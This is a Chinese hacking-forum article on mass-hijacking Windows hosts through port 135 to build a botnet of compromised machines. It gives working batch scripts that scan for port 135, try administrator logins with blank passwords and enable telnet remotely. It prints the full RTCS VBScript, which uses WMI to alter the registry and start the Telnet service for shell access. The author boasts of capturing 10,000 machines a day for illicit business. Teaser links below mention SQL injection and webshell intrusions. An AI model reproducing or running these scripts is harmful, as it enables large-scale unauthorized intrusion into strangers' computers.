经典入侵:利用常见的135端口批量抓肉鸡

所属分类: 网络安全 / 黑客入侵 阅读数: 170
收藏 0 赞 0 分享
关于135抓肉鸡的分析最近好象135搞的很火热 看见有人也把那个批量抓135肉鸡的工具发出来了我也就说下把 反正俺也不早就不用那鸟东西了 上次看了那个也说一天抓1000只肉鸡 由于我是开快进看的 没仔细的看 我以为他是自动登陆telnet 所以我就晕死了 应为自动登陆telnet我以前研究很多 我由于我批处理我学的不怎么样也就会点皮毛就加了他 结果他一上来就开口批量开23卖2000RMB 人品啊 我倒 那鸟东西不清楚大家知道作者不 那是02年安全焦点的大哥写的 我有RT整个全套代码的 一万年前我就知道怎么批量开23了 不废话了先说其他的把 后来一位大哥把他的RT整套脚本整合写了一个RCMD1。05这个是目前的最新版好象 需要解决的问题我详细的说一下把 首先要解决的就是批量开23了 rtcs脚本(百度一下有下的找不到就是搜索水品问题了) 里面的代码如果懂VBS的朋友去看下 就是先用VBS远程连接主机的wmi服务 然后剩下的是开启和过认证部分 以前有一篇文章分析过说是作者写的有一个小BUG 就是如果原来已经开启的话可以直接转到退出的 这里不多说这个了 for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit 这个是我以前写的一个批处理 有兴趣的朋友可以看下 其实很简单 外面流传的需要过滤23 我的不需要过滤23 有兴趣的朋友可以看下 代码正确性没测试应为我写过好几个版本现在已经不记得哪个是可以用的了 但是思路很明显的相信大家可以看明白 要解决的问题二 我也尝试了用脚本来实现先telnet ip 然后sendkey 后来发现问题大大的 只能一个一个种植不能实现批量种植 后来朋友给冰冰批量 就是现在大家可以在外面找的版本 他很好的解决了批量登陆和自动种植的问题 调用辅助工具 设置登陆脚本然后自动种植 但是我相信用的朋友一定知道有什么问题 telnet认证是很复杂的 此外容易出现提示丢失脚本的错误 其他的不知道说什么了 我今天上网给朋友搞东西 弄的累的要死 思路不是很清楚 我在总结下把 首先写一个S扫描的BAT然后里面用FOR循环自动整理IP 然后NT过滤 然后调用上面我发的批处理批量开23 然后写一个批处理直接调用辅助工具自动登陆自动种植 效果如何 大家详细的去看动画就知道了 而后来我写的一个版本 就很帅了 嘿嘿 保密中 应为工具是给兄弟群共享的 他们有业务来着 如果我把东西发布了说是会干掉我 怕怕 给会懂VBS的朋友说一下把 引导一下思路 前面的扫描和和NT过滤还是一样的不说了 远程连接wmi大家可以看rtcs的脚本 关键地方就是下面了 难道远程连接到了wmi服务就只有开telnet一条出路吗 貌似wmi功能多多把 具体能干什么去看安焦点rtcs作者02年的文章把 目前我写的脚本和所有的工具打包起来也才70多K 同时开4个服务器一天抓1万只肉鸡 信不信由你 相信大家都知道recton里有一个http种植者的功能把 去找找文章看人家怎么实现的 最近风声很紧有业务的朋友最好小心 最近的通道不是那么安全 这个是rtcs的代码 自己保存成VBS on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number) wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function 经典吧,呵呵,我觉得,呵呵,管理员要给我加钱啊,呵呵
关于for循环 我解释下 for /f这个这个参数表示对文本操作 tokens表示截取 tokens=1,2表示选取1,2两个部分 eol表示忽略 eol=-表示忽略-开始的行 delims表示分割符 delims=,表示对每行以“,”为分割符号对行进行分割字符 那么我给大家写一个S扫描自动整理IP的批处理把 s.bat setlocal
cls
color A
title 自动抓鸡v1.0
echo ======================================================
echo 自动抓鸡v1.0
echo 作者:hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt 扫描那行的FOR循环 for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是说 从ip.txt中对每行以空格分割 然后取得分割后的第一部分和第二部分字符 第一个%%i是形参 代替你要取出来的部分 那么后面的2个部分的%%i 和%%j表示取出的两个部分按顺序代替的参数了 后面的几行都是扫描完成的result过滤整理 先忽略以空格 - P S开头的行 然后用echo写入文本来转的 用法 大家把上面的批处理代码保存成 s.bat然后在同一目录建立一个ip.txt的文本 然后把下面的这些复制进IP。TXT里面 (不需要整理 直接全放进去 汉字不需要去掉) 扫描和整理结束以后会有一个S。TXT文本 自己打开看看效果把 ^_^ 忘了说了把s.exe ip.txt和s.bat放在同一目录 好了我闪了.

更多精彩内容其他人还在看

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享

传世木马盗号过程分析

玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木马盗号的原理(如果有那位大侠认为不够准确或是原理有所出入
收藏 0 赞 0 分享

浅析*NIX机器的入侵

目前来说*NIX机器早已经成为INTERNRT的主流服务器操作系统了,UNIX系列系统的优势相WINDOWS比较而言优势也是显而易见的。 而与之接口的脚本目前来说是以PHP MYSQL为主。当然也不乏大公司用JSP和CGI和PL,不过CGI和PL的处理相对比较困难一点,容易造
收藏 0 赞 0 分享

一次透过SNIFF有目的性的入侵

一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF 宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间
收藏 0 赞 0 分享

渗透日本服务器群

因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^ 开局: 入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。 以下是引用片段: down.vbs iLocal = LCase(WScript.Ar
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程2

遇阻:寻找VOD电影   首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。   可随后
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程1

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路
收藏 0 赞 0 分享

入侵藏在防火墙后面的机子

事情是这样的: 遭遇一台湾的dns服务器,win2003 server 扫描器报告的开放端口:21,53,80 ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
收藏 0 赞 0 分享

看清黑客穿透ADSL路由入侵内网

也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。 一.扫描 现在很多ADSL MODEM都是通过80、2
收藏 0 赞 0 分享
查看更多